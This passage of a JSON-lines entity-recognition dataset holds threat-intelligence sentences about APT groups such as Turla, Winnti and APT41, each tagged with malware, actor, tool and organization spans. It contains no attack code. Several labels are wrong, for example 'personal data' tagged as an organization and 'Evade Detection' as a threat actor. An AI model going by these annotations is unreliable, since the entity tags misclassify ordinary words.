XAGENT.B .", "spans": {"MALWARE: XAgent": [[14, 20]], "MALWARE: IOS_XAGENT.A": [[33, 45]], "MALWARE: MadCap": [[105, 111]], "MALWARE: XAGENT.B": [[129, 137]]}, "info": {"id": "dnrti_train_002959", "source": "dnrti_train"}} {"text": "The obvious goal of the SEDNIT-related spyware is to steal personal data , record audio , make screenshots , and send them to a remote command-and-control (C&C) server .", "spans": {"THREAT_ACTOR: SEDNIT-related": [[24, 38]], "ORGANIZATION: personal data": [[59, 72]]}, "info": {"id": "dnrti_train_002960", "source": "dnrti_train"}} {"text": "Madcap” is similar to the XAgent malware , but the former is focused on recording audio .", "spans": {"MALWARE: Madcap”": [[0, 7]], "MALWARE: XAgent": [[26, 32]]}, "info": {"id": "dnrti_train_002961", "source": "dnrti_train"}} {"text": "To learn more about this campaign , you may refer to our report , Operation Pawn Storm Using Decoys to Evade Detection .", "spans": {"THREAT_ACTOR: Evade Detection": [[103, 118]]}, "info": {"id": "dnrti_train_002962", "source": "dnrti_train"}} {"text": "Additionally , we discovered a new DNS hijacking technique that we assess with moderate confidence is connected to the actors behind Sea Turtle .", "spans": {"THREAT_ACTOR: actors": [[119, 125]]}, "info": {"id": "dnrti_train_002963", "source": "dnrti_train"}} {"text": "Talos now has moderate confidence that the threat actors behind Sea Turtle have been using another DNS hijacking technique .", "spans": {"ORGANIZATION: Talos": [[0, 5]]}, "info": {"id": "dnrti_train_002964", "source": "dnrti_train"}} {"text": "This technique was also observed against a government organizations in the Middle East and North African region .", "spans": {}, "info": {"id": "dnrti_train_002965", "source": "dnrti_train"}} {"text": "Cisco telemetry confirmed that the actors behind Sea Turtle maintained access to the ICS-Forth network from an operational command and control (C2) node .", "spans": {"ORGANIZATION: Cisco": [[0, 5]], "TOOL: control 
(C2)": [[135, 147]]}, "info": {"id": "dnrti_train_002966", "source": "dnrti_train"}} {"text": "Our telemetry indicates that the actors maintained access in the ICS-Forth network through at least April 24 , five days after the statement was publicly released .", "spans": {"THREAT_ACTOR: actors": [[33, 39]]}, "info": {"id": "dnrti_train_002967", "source": "dnrti_train"}} {"text": "This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’ .", "spans": {"MALWARE: ‘Tokyo’": [[64, 71]], "MALWARE: ‘Yokohama’": [[76, 86]]}, "info": {"id": "dnrti_train_002968", "source": "dnrti_train"}} {"text": "The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014 .", "spans": {"MALWARE: TajMahal": [[30, 38]]}, "info": {"id": "dnrti_train_002970", "source": "dnrti_train"}} {"text": "More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com) .", "spans": {"MALWARE: TajMahal": [[19, 27]], "ORGANIZATION: Kaspersky": [[62, 71]]}, "info": {"id": "dnrti_train_002971", "source": "dnrti_train"}} {"text": "The dropper first appeared in mid-July , suggesting that this APT activity is potentially ongoing , with Turla actively targeting G20 participants and/or those with interest in the G20 , including member nations , journalists , and policymakers .", "spans": {"THREAT_ACTOR: Turla": [[105, 110]]}, "info": {"id": "dnrti_train_002972", "source": "dnrti_train"}} {"text": "Turla is a well-documented , long operating APT group that is widely believed to be a Russian state-sponsored organization .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_002973", "source": "dnrti_train"}} {"text": "Turla is perhaps most notoriously suspected as responsible for the breach of the United States Central Command in 2008 .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_002974", "source": "dnrti_train"}} {"text": "More 
recently Turla was accused of breaching RUAG , a Swiss technology company , in a public report published by GovCERT.ch .", "spans": {"THREAT_ACTOR: Turla": [[14, 19]], "ORGANIZATION: RUAG": [[45, 49]], "ORGANIZATION: GovCERT.ch": [[113, 123]]}, "info": {"id": "dnrti_train_002975", "source": "dnrti_train"}} {"text": "The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository .", "spans": {"MALWARE: MSIL dropper": [[71, 83]], "ORGANIZATION: Proofpoint": [[110, 120]]}, "info": {"id": "dnrti_train_002976", "source": "dnrti_train"}} {"text": "Assuming this variant of KopiLuwak has been observed in the wild , there are a number of ways it may have been delivered including some of Turla’s previous attack methods such as spear phishing or via a watering hole .", "spans": {"THREAT_ACTOR: Turla’s": [[139, 146]]}, "info": {"id": "dnrti_train_002977", "source": "dnrti_train"}} {"text": "This could include diplomats , experts in the areas of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": {"ORGANIZATION: diplomats": [[19, 28]], "ORGANIZATION: journalists": [[125, 136]]}, "info": {"id": "dnrti_train_002978", "source": "dnrti_train"}} {"text": "Turla's goal could include diplomats , experts in the areas of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": {"THREAT_ACTOR: Turla's": [[0, 7]]}, "info": {"id": "dnrti_train_002979", "source": "dnrti_train"}} {"text": "The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper .", "spans": {"MALWARE: KopiLuwak": [[70, 79]], "MALWARE: MSIL dropper": [[147, 159]]}, "info": {"id": "dnrti_train_002980", "source": "dnrti_train"}} {"text": "The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy 
and a Javascript (JS) dropper .", "spans": {"MALWARE: MSIL dropper": [[48, 60]], "MALWARE: Javascript (JS) dropper": [[115, 138]]}, "info": {"id": "dnrti_train_002981", "source": "dnrti_train"}} {"text": "As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only .", "spans": {"MALWARE: JS dropper": [[43, 53]], "MALWARE: JS decryptor": [[76, 88]], "MALWARE: KopiLuwak": [[168, 177]]}, "info": {"id": "dnrti_train_002982", "source": "dnrti_train"}} {"text": "As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload .", "spans": {"ORGANIZATION: Proofpoint": [[3, 13]], "MALWARE: MSIL payload": [[145, 157]]}, "info": {"id": "dnrti_train_002983", "source": "dnrti_train"}} {"text": "Despite the added capabilities , we still agree with Kaspersky that this backdoor is likely used as an initial reconnaissance tool and would probably be used as a staging point to deploy one of Turla’s more fully featured implants .", "spans": {"ORGANIZATION: Kaspersky": [[53, 62]], "THREAT_ACTOR: Turla’s": [[194, 201]]}, "info": {"id": "dnrti_train_002985", "source": "dnrti_train"}} {"text": "Turla is a complex cyberattack platform focused predominantly on diplomatic and government-related targets , particularly in the Middle East , Central and Far East Asia , Europe , North and South America and former Soviet bloc nations .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_002986", "source": "dnrti_train"}} {"text": "We didn’t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves .", "spans": {"MALWARE: .NET malware": [[51, 63]], "MALWARE: Topinambour": [[84, 95]]}, "info": {"id": "dnrti_train_002987", "source": "dnrti_train"}} {"text": "The role of the .NET module is to deliver the known 
KopiLuwak JavaScript Trojan .", "spans": {"MALWARE: .NET module": [[16, 27]], "MALWARE: KopiLuwak JavaScript": [[52, 72]]}, "info": {"id": "dnrti_train_002988", "source": "dnrti_train"}} {"text": "Moreover , Turla now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak .", "spans": {"THREAT_ACTOR: Turla": [[11, 16]]}, "info": {"id": "dnrti_train_002989", "source": "dnrti_train"}} {"text": "RocketMan!” (probably a reference to Donald Trump’s nickname for Kim Jong Un) and MiamiBeach” serve as the first beacon messages from the victim to the control server .", "spans": {"MALWARE: RocketMan!”": [[0, 11]], "MALWARE: MiamiBeach”": [[82, 93]]}, "info": {"id": "dnrti_train_002990", "source": "dnrti_train"}} {"text": "These could be tools to circumvent internet censorship , such as Softether VPN 4.12” and psiphon3” , or Microsoft Office activators” .", "spans": {"MALWARE: Softether VPN 4.12”": [[65, 84]], "MALWARE: psiphon3”": [[89, 98]], "MALWARE: Microsoft Office activators”": [[104, 132]]}, "info": {"id": "dnrti_train_002991", "source": "dnrti_train"}} {"text": "These campaign-related VPSs are located in South Africa .", "spans": {"THREAT_ACTOR: VPSs": [[23, 27]]}, "info": {"id": "dnrti_train_002992", "source": "dnrti_train"}} {"text": "The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen” command to take a screenshot .", "spans": {"MALWARE: Trojan": [[4, 10]], "MALWARE: .NET RocketMan Trojan": [[35, 56]]}, "info": {"id": "dnrti_train_002995", "source": "dnrti_train"}} {"text": "The usage of KopiLuwak , a well-known and exclusive artefact previously used by the Turla group , makes us attribute this campaign to this actor with high confidence .", "spans": {"TOOL: KopiLuwak": [[13, 22]], "THREAT_ACTOR: Turla": [[84, 89]]}, "info": {"id": "dnrti_train_002996", "source": "dnrti_train"}} {"text": "Winnti's mode of operation: to collect information on the organizational charts 
of companies , on cooperating departments , on the IT systems of individual business units , and on trade secrets , obviously .", "spans": {"THREAT_ACTOR: Winnti's": [[0, 8]]}, "info": {"id": "dnrti_train_002997", "source": "dnrti_train"}} {"text": "Hackers usually take precautions , which experts refer to as Opsec .", "spans": {"THREAT_ACTOR: Hackers": [[0, 7]]}, "info": {"id": "dnrti_train_002998", "source": "dnrti_train"}} {"text": "The Winnti group’s Opsec was dismal to say the least .", "spans": {"THREAT_ACTOR: Winnti": [[4, 10]]}, "info": {"id": "dnrti_train_002999", "source": "dnrti_train"}} {"text": "This mode of operation is typical of many hacker groups—and especially of Winnti .", "spans": {"THREAT_ACTOR: hacker": [[42, 48]], "THREAT_ACTOR: Winnti": [[74, 80]]}, "info": {"id": "dnrti_train_003000", "source": "dnrti_train"}} {"text": "They are a very , very persistent group , ” says Costin Raiu , who has been watching Winnti since 2011 .", "spans": {"ORGANIZATION: Costin Raiu": [[49, 60]], "THREAT_ACTOR: Winnti": [[85, 91]]}, "info": {"id": "dnrti_train_003001", "source": "dnrti_train"}} {"text": "Raiu and his team have followed the digital tracks left behind by some of the Winnti hackers .", "spans": {"ORGANIZATION: Raiu": [[0, 4]], "THREAT_ACTOR: Winnti": [[78, 84]]}, "info": {"id": "dnrti_train_003002", "source": "dnrti_train"}} {"text": "One government official puts it very matter-of-factly: Winnti is very specific to Germany .", "spans": {"THREAT_ACTOR: Winnti": [[55, 61]]}, "info": {"id": "dnrti_train_003003", "source": "dnrti_train"}} {"text": "By 2014 , the Winnti malware code was no longer limited to game manufacturers .", "spans": {"THREAT_ACTOR: Winnti": [[14, 20]]}, "info": {"id": "dnrti_train_003004", "source": "dnrti_train"}} {"text": "Winnti is targeting high-tech companies as well as chemical and pharmaceutical companies .", "spans": {"THREAT_ACTOR: Winnti": [[0, 6]], "ORGANIZATION: high-tech companies": [[20, 39]], "ORGANIZATION: 
pharmaceutical companies": [[64, 88]]}, "info": {"id": "dnrti_train_003005", "source": "dnrti_train"}} {"text": "Winnti is attacking companies in Japan , France , the U.S. and Germany .", "spans": {"THREAT_ACTOR: Winnti": [[0, 6]]}, "info": {"id": "dnrti_train_003006", "source": "dnrti_train"}} {"text": "The Winnti hackers broke into Henkel’s network in 2014 .", "spans": {"THREAT_ACTOR: Winnti": [[4, 10]], "ORGANIZATION: Henkel’s": [[30, 38]]}, "info": {"id": "dnrti_train_003007", "source": "dnrti_train"}} {"text": "Henkel confirms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions .", "spans": {"ORGANIZATION: Henkel": [[0, 6]], "THREAT_ACTOR: Winnti": [[20, 26]]}, "info": {"id": "dnrti_train_003008", "source": "dnrti_train"}} {"text": "Far from attacking Henkel and the other companies arbitrarily , Winnti takes a highly strategic approach .", "spans": {"ORGANIZATION: Henkel": [[19, 25]], "THREAT_ACTOR: Winnti": [[64, 70]]}, "info": {"id": "dnrti_train_003009", "source": "dnrti_train"}} {"text": "The hackers behind Winnti have also set their sights on Japan’s biggest chemical company , Shin-Etsu Chemical .", "spans": {"THREAT_ACTOR: hackers": [[4, 11]], "ORGANIZATION: Shin-Etsu Chemical": [[91, 109]]}, "info": {"id": "dnrti_train_003010", "source": "dnrti_train"}} {"text": "In the case of another Japanese company , Sumitomo Electric , Winnti apparently penetrated their networks during the summer of 2016 .", "spans": {"ORGANIZATION: Sumitomo Electric": [[42, 59]], "THREAT_ACTOR: Winnti": [[62, 68]]}, "info": {"id": "dnrti_train_003011", "source": "dnrti_train"}} {"text": "Winnti hackers also penetrated the BASF and Siemens networks .", "spans": {"THREAT_ACTOR: Winnti": [[0, 6]], "ORGANIZATION: BASF": [[35, 39]], "ORGANIZATION: Siemens": [[44, 51]], "ORGANIZATION: networks": [[52, 60]]}, "info": {"id": "dnrti_train_003012", "source": "dnrti_train"}} {"text": 
"Thanks to this tool , we found out back in March 2019 that the Bayer pharmaceutical group had been hacked by Winnti .", "spans": {"ORGANIZATION: Bayer pharmaceutical": [[63, 83]], "THREAT_ACTOR: Winnti": [[109, 115]]}, "info": {"id": "dnrti_train_003013", "source": "dnrti_train"}} {"text": "At Gameforge , the Winnti hackers had already been removed from the networks when a staff member noticed a Windows start screen with Chinese characters .", "spans": {"THREAT_ACTOR: Winnti": [[19, 25]]}, "info": {"id": "dnrti_train_003014", "source": "dnrti_train"}} {"text": "To witnesses , the spy appears to be running a program showing videos (e.g VLC) , presenting slides (Prezi) , playing a computer game (Breakout2 , 2048) or even running a fake virus scanner .", "spans": {"THREAT_ACTOR: spy": [[19, 22]], "TOOL: presenting slides": [[82, 99]], "TOOL: fake virus scanner": [[171, 189]]}, "info": {"id": "dnrti_train_003015", "source": "dnrti_train"}} {"text": "From the time of file creation , the attacker started working at least as early as July 2018 .", "spans": {"THREAT_ACTOR: attacker": [[37, 45]]}, "info": {"id": "dnrti_train_003016", "source": "dnrti_train"}} {"text": "The link to feeds.rapidfeeds.com left in its XML configuration file was also mentioned by Kaspersky’s report in the reference section , which confirms that the APT-C-09 group keeps updating its C2 configuration channel and the recent one reserves some past features .", "spans": {"ORGANIZATION: Kaspersky’s": [[90, 101]], "THREAT_ACTOR: APT-C-09": [[160, 168]]}, "info": {"id": "dnrti_train_003017", "source": "dnrti_train"}} {"text": "For example , Donot and Bitter disguised as Kashmiri Voice to attack Pakistan , Transparent Tribe attacked India with decoy document regarding terrorist attacks in Kashmir .", "spans": {"THREAT_ACTOR: Donot": [[14, 19]], "THREAT_ACTOR: Bitter": [[24, 30]]}, "info": {"id": "dnrti_train_003018", "source": "dnrti_train"}} {"text": "Considering APT-C-09 , Bitter and Donot have carried 
out targeted attacks against China , we must take actions in advance and keep a close eye on their recent activities .", "spans": {"THREAT_ACTOR: APT-C-09": [[12, 20]], "THREAT_ACTOR: Bitter": [[23, 29]], "THREAT_ACTOR: Donot": [[34, 39]]}, "info": {"id": "dnrti_train_003019", "source": "dnrti_train"}} {"text": "APT41 espionage operations against the healthcare , high-tech , and telecommunications sectors include establishing and maintaining strategic access , and through mid-2015 , the theft of intellectual property .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003020", "source": "dnrti_train"}} {"text": "FireEye Threat Intelligence assesses with high confidence that APT41 carries out an array of financially motivated intrusions , particularly against the video game industry , including stealing source code and digital certificates , virtual currency manipulation , and attempting to deploy ransomware .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT41": [[63, 68]]}, "info": {"id": "dnrti_train_003021", "source": "dnrti_train"}} {"text": "APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage operations in what appears to be activity that falls outside the scope of state-sponsored missions .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003023", "source": "dnrti_train"}} {"text": "Based on early observed activity , consistent behavior , and APT41's unusual focus on the video game industry , we believe the group's cyber crime activities are most likely motivated by personal financial gain or hobbyist interests .", "spans": {"THREAT_ACTOR: APT41's": [[61, 68]]}, "info": {"id": "dnrti_train_003024", "source": "dnrti_train"}} {"text": "APT41 campaigns include most of the incidents previously attributed in FireEye Threat Intelligence reporting to GREF Team and a number of additional clusters that were previously unnamed .", 
"spans": {"THREAT_ACTOR: APT41": [[0, 5]], "ORGANIZATION: FireEye": [[71, 78]]}, "info": {"id": "dnrti_train_003025", "source": "dnrti_train"}} {"text": "Activity traces back to 2012 when individual members of APT41 conducted primarily financially motivated operations focused on the video game industry before expanding into likely statesponsored activity .", "spans": {"THREAT_ACTOR: APT41": [[56, 61]]}, "info": {"id": "dnrti_train_003026", "source": "dnrti_train"}} {"text": "APT41 has targeted organizations in 14 countries (and Hong Kong) over seven years , including: France , India , Italy , Japan , Myanmar , the Netherlands , Singapore , South Korea , South Africa , Switzerland , Thailand , Turkey , the United Kingdom , and the United States (Figure 1) .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003028", "source": "dnrti_train"}} {"text": "APT41 espionage operations against entities in these countries follow targeting of verticals consistent with Chinese national policy priorities .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003029", "source": "dnrti_train"}} {"text": "In 2014 , APT41 was observed carrying out espionage campaigns concurrently with financially motivated intrusions , demonstrating that they could balance different objectives simultaneously .", "spans": {"THREAT_ACTOR: APT41": [[10, 15]]}, "info": {"id": "dnrti_train_003031", "source": "dnrti_train"}} {"text": "Since 2017 , APT41's activities have included a series of supply chain compromises .", "spans": {"THREAT_ACTOR: APT41's": [[13, 20]]}, "info": {"id": "dnrti_train_003032", "source": "dnrti_train"}} {"text": "The group also targeted companies involved in producing motherboards , processors , and server solutions for enterprises .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_003033", "source": "dnrti_train"}} {"text": "Since 2013 , APT41 has targeted organizations involved in the research , development , 
and sale of computer components used for machine-learning , autonomous vehicles , medical imaging , and the consumer market .", "spans": {"THREAT_ACTOR: APT41": [[13, 18]]}, "info": {"id": "dnrti_train_003034", "source": "dnrti_train"}} {"text": "In a 2014 compromise , APT41 targeted a European conglomerate and specifically focused on systems physically located in China .", "spans": {"THREAT_ACTOR: APT41": [[23, 28]]}, "info": {"id": "dnrti_train_003035", "source": "dnrti_train"}} {"text": "In spring 2015 , APT41 targeted information related to two entities undergoing a merger announced the previous year .", "spans": {"THREAT_ACTOR: APT41": [[17, 22]]}, "info": {"id": "dnrti_train_003036", "source": "dnrti_train"}} {"text": "Since 2017 , APT41 has consistently targeted telecommunications companies , possibly a crucial first step to establish a foothold in targeting a particular region .", "spans": {"THREAT_ACTOR: APT41": [[13, 18]]}, "info": {"id": "dnrti_train_003037", "source": "dnrti_train"}} {"text": "Targeted telecom companies spanned several countries , and recently identified intrusions were concentrated in countries where we had not identified any prior APT41 activity .", "spans": {"ORGANIZATION: telecom companies": [[9, 26]], "THREAT_ACTOR: APT41": [[159, 164]]}, "info": {"id": "dnrti_train_003038", "source": "dnrti_train"}} {"text": "In July and August 2016 , APT41 sent spear-phishing emails to Hong Kong media organizations known for pro-democracy editorial content .", "spans": {"THREAT_ACTOR: APT41": [[26, 31]]}, "info": {"id": "dnrti_train_003039", "source": "dnrti_train"}} {"text": "This was the first instance we have observed of APT41 targeting pro-democracy groups in Hong Kong .", "spans": {"THREAT_ACTOR: APT41": [[48, 53]]}, "info": {"id": "dnrti_train_003040", "source": "dnrti_train"}} {"text": "APT41 frequently leverages timely news stories as the lure content in their spear-phishing emails , although social engineering content does not always 
correlate with targeted users or organizations .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003041", "source": "dnrti_train"}} {"text": "In 2015 , APT41 targeted a Japanese media organization with a lure document (Figure 3) titled 中東呼吸器症候 群(MERS)の予防 , ” which translates to Prevention of Middle East Respiratory Syndrome (MERS) .", "spans": {"THREAT_ACTOR: APT41": [[10, 15]]}, "info": {"id": "dnrti_train_003042", "source": "dnrti_train"}} {"text": "APT41 activity aimed at medical device companies and pharmaceuticals is demonstrative of the group's capacity to collect sensitive and highly valuable intellectual property (IP) , although we have not observed evidence of IP theft since late 2015 .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003043", "source": "dnrti_train"}} {"text": "Unlike other observed Chinese espionage operators , APT41 conducts explicit financially motivated activity , which has included the use of tools that are otherwise exclusively used in campaigns supporting state interests .", "spans": {"THREAT_ACTOR: APT41": [[52, 57]]}, "info": {"id": "dnrti_train_003044", "source": "dnrti_train"}} {"text": "Although APT41 initially targeted the parent company , 30 percent of the victimized hosts were related to a subsidiary specialized in manufacturing medical devices .", "spans": {"THREAT_ACTOR: APT41": [[9, 14]]}, "info": {"id": "dnrti_train_003045", "source": "dnrti_train"}} {"text": "In 2018 , we observed APT41 target a third healthcare company , although their goals during this compromise were unclear .", "spans": {"THREAT_ACTOR: APT41": [[22, 27]]}, "info": {"id": "dnrti_train_003046", "source": "dnrti_train"}} {"text": "This provides another connection between the targeting of the cryptocurrency organizations and video game targeting .", "spans": {}, "info": {"id": "dnrti_train_003048", "source": "dnrti_train"}} {"text": "In October 2018 , the group compiled an instance of XMRig , a Monero 
cryptocurrency mining tool , demonstrating a continued interest in cryptocurrency .", "spans": {"THREAT_ACTOR: group": [[22, 27]], "TOOL: XMRig": [[52, 57]]}, "info": {"id": "dnrti_train_003049", "source": "dnrti_train"}} {"text": "APT41 campaigns focused on the video game sector have largely affected studios and distributors in East and Southeast Asia , although global companies based in the United States have also been targeted .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003050", "source": "dnrti_train"}} {"text": "APT41 continuously returns to targeting the video game sector and seems to have matured its campaigns through lessons learned in operations against the industry .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003051", "source": "dnrti_train"}} {"text": "We believe these operations include broadly malicious activity that can enable further operations , such as targeting game source code and compromising digital certificates , while other activities are explicitly financially motivated , such as abusing in-game currency mechanics .", "spans": {"TOOL: game source code": [[118, 134]], "TOOL: digital certificates": [[152, 172]]}, "info": {"id": "dnrti_train_003052", "source": "dnrti_train"}} {"text": "In October 2012 , APT41 used captured credentials to compromise a jump server and access a production environment where they deployed a Linux version of PHOTO .", "spans": {"THREAT_ACTOR: APT41": [[18, 23]]}, "info": {"id": "dnrti_train_003053", "source": "dnrti_train"}} {"text": "Since at least 2012 , APT41 has repeatedly gained access to game development environments within affected companies , including online multiplayer networks , as well as targeting of production database administrators .", "spans": {"THREAT_ACTOR: APT41": [[22, 27]], "ORGANIZATION: administrators": [[202, 216]]}, "info": {"id": "dnrti_train_003054", "source": "dnrti_train"}} {"text": "APT41 has been observed inserting 
malicious code into legitimate video game files to distribute malware .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003055", "source": "dnrti_train"}} {"text": "In 2018 , the group inserted CRACKSHOT malware into game files that were signed with legitimate codesigning certificates , most likely indicating access to the production environment , which facilitated a supply chain compromise .", "spans": {"THREAT_ACTOR: group": [[14, 19]]}, "info": {"id": "dnrti_train_003056", "source": "dnrti_train"}} {"text": "We have also observed APT41 limitedly deploy rootkits on Linux systems and Master Boot Record (MBR) bootkits , such as ROCKBOOT , on Windows systems to hide their malware and maintain persistence on victim systems .", "spans": {"THREAT_ACTOR: APT41": [[22, 27]], "TOOL: ROCKBOOT": [[119, 127]]}, "info": {"id": "dnrti_train_003057", "source": "dnrti_train"}} {"text": "Selective deployment of ROCKBOOT suggests that APT41 reserves more advanced TTPs and malware only for high-value targets .", "spans": {"ORGANIZATION: ROCKBOOT": [[24, 32]], "THREAT_ACTOR: APT41": [[47, 52]]}, "info": {"id": "dnrti_train_003058", "source": "dnrti_train"}} {"text": "APT41 has blatantly engaged in financially motivated activity targeting the video game industry , including manipulating virtual currencies .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003059", "source": "dnrti_train"}} {"text": "In a highly unusual case , APT41 attempted to extort a game company by deploying the Encryptor RaaS ransomware .", "spans": {"THREAT_ACTOR: APT41": [[27, 32]]}, "info": {"id": "dnrti_train_003060", "source": "dnrti_train"}} {"text": "APT41 is well-known for leveraging compromised digital certificates from video game studios to sign malware .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003061", "source": "dnrti_train"}} {"text": "APT41 has also used credentials compromised in previous operations .", "spans": 
{"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003063", "source": "dnrti_train"}} {"text": "In 2014 , APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service .", "spans": {"THREAT_ACTOR: APT41": [[10, 15]], "ORGANIZATION: service provider": [[101, 117]], "ORGANIZATION: payment": [[135, 142]], "ORGANIZATION: service": [[143, 150]]}, "info": {"id": "dnrti_train_003064", "source": "dnrti_train"}} {"text": "Although we do not have first-hand evidence of APT41's compromise of TeamViewer , we have observed APT41 use compromised TeamViewer credentials as an entry point at multiple organizations .", "spans": {"TOOL: TeamViewer": [[69, 79]], "THREAT_ACTOR: APT41": [[99, 104]]}, "info": {"id": "dnrti_train_003065", "source": "dnrti_train"}} {"text": "Public reports of supply chain compromises linked to APT41 date back to at least 2014 , and technical evidence associated with these incidents was used to determine a relationship , if any , with APT41 .", "spans": {"THREAT_ACTOR: APT41": [[53, 58], [196, 201]]}, "info": {"id": "dnrti_train_003066", "source": "dnrti_train"}} {"text": "As demonstrated in operations targeting the video game industry , APT41 leverages a variety of TTPs to access production environments where they can inject malicious code into legitimate files .", "spans": {"THREAT_ACTOR: APT41": [[66, 71]], "TOOL: variety of TTPs": [[84, 99]]}, "info": {"id": "dnrti_train_003067", "source": "dnrti_train"}} {"text": "In March 2017 , suspected Chinese espionage operators targeted CCleaner , a utility that assists in the removal of unwanted files from a computer .", "spans": {"THREAT_ACTOR: Chinese espionage operators": [[26, 53]]}, "info": {"id": "dnrti_train_003068", "source": "dnrti_train"}} {"text": "In July 2017 , APT41 injected malicious code into a software update package maintained by Netsarang and signed it with a legitimate Netsarang certificate in an 
operation referred to as ShadowPad by Kaspersky .", "spans": {"THREAT_ACTOR: APT41": [[15, 20]], "ORGANIZATION: Kaspersky": [[198, 207]]}, "info": {"id": "dnrti_train_003069", "source": "dnrti_train"}} {"text": "Both APT41 and the actors in the CCleaner incident used TeamViewer during initial compromise .", "spans": {"THREAT_ACTOR: APT41": [[5, 10]], "TOOL: TeamViewer": [[56, 66]]}, "info": {"id": "dnrti_train_003070", "source": "dnrti_train"}} {"text": "Supply chain compromises are most likely an extension of APT41's tactics used in gaining access to gaming development environments and to other gaming organizations via third-party service providers .", "spans": {"THREAT_ACTOR: APT41's": [[57, 64]]}, "info": {"id": "dnrti_train_003071", "source": "dnrti_train"}} {"text": "Beginning in July 2018 , APT41 appeared to have directly targeted several East and Southeast Asia-based video game developers and distributors to inject legitimate executables with the CRACKSHOT backdoor .", "spans": {"THREAT_ACTOR: APT41": [[25, 30]]}, "info": {"id": "dnrti_train_003072", "source": "dnrti_train"}} {"text": "The lure used to target the cryptocurrency exchange (displayed in Figure 5 and translated in Figure 6) referenced an online gaming platform , tying the cryptocurrency targeting to APT41's focus on video game-related targeting .", "spans": {"THREAT_ACTOR: APT41's": [[180, 187]]}, "info": {"id": "dnrti_train_003073", "source": "dnrti_train"}} {"text": "FireEye malware analysis identified source code overlaps between malware used by APT41 in May 2016 targeting of a U.S.-based game development studio and the malware observed in supply chain compromises in 2017 and 2018 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT41": [[81, 86]]}, "info": {"id": "dnrti_train_003074", "source": "dnrti_train"}} {"text": "In May 2016 , APT41 deployed a POISONPLUG sample at a U.S.-based game development studio .", "spans": {"THREAT_ACTOR: APT41": [[14, 19]]}, "info": {"id": 
"dnrti_train_003075", "source": "dnrti_train"}} {"text": "Either APT41 is operating outside of state control but still working with other Chinese APT malware actors , tools , and infrastructure on a parttime or contractual basis , or APT41 is a full-time .", "spans": {"THREAT_ACTOR: APT41": [[7, 12], [176, 181]]}, "info": {"id": "dnrti_train_003077", "source": "dnrti_train"}} {"text": "APT41 uses many of the same tools and compromised digital certificates that have been leveraged by other Chinese espionage operators .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: digital certificates": [[50, 70]]}, "info": {"id": "dnrti_train_003078", "source": "dnrti_train"}} {"text": "APT41 has used several malware families that have also been used by other Chinese espionage operators , including variants of HIGHNOON , HOMEUNIX , PHOTO , SOGU , and ZXSHELL , among others .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: HIGHNOON": [[126, 134]], "TOOL: HOMEUNIX": [[137, 145]], "TOOL: PHOTO": [[148, 153]], "TOOL: SOGU": [[156, 160]], "TOOL: ZXSHELL": [[167, 174]]}, "info": {"id": "dnrti_train_003080", "source": "dnrti_train"}} {"text": "HIGHNOON , one of the main code families observed being used by APT41 , was also used by APT17 in 2015 to target semiconductor and chemical manufacturers .", "spans": {"TOOL: HIGHNOON": [[0, 8]], "THREAT_ACTOR: APT41": [[64, 69]], "THREAT_ACTOR: APT17": [[89, 94]]}, "info": {"id": "dnrti_train_003081", "source": "dnrti_train"}} {"text": "HOMEUNIX , another popular backdoor used by APT41 , has been used by at least 14 separate Chinese espionage groups , including APT1 , APT10 , APT17 , APT18 , and APT20 .", "spans": {"TOOL: HOMEUNIX": [[0, 8]], "TOOL: backdoor": [[27, 35]], "THREAT_ACTOR: APT41": [[44, 49]], "THREAT_ACTOR: groups": [[108, 114]], "THREAT_ACTOR: APT1": [[127, 131]], "THREAT_ACTOR: APT10": [[134, 139]], "THREAT_ACTOR: APT17": [[142, 147]], "THREAT_ACTOR: APT18": [[150, 155]], "THREAT_ACTOR: 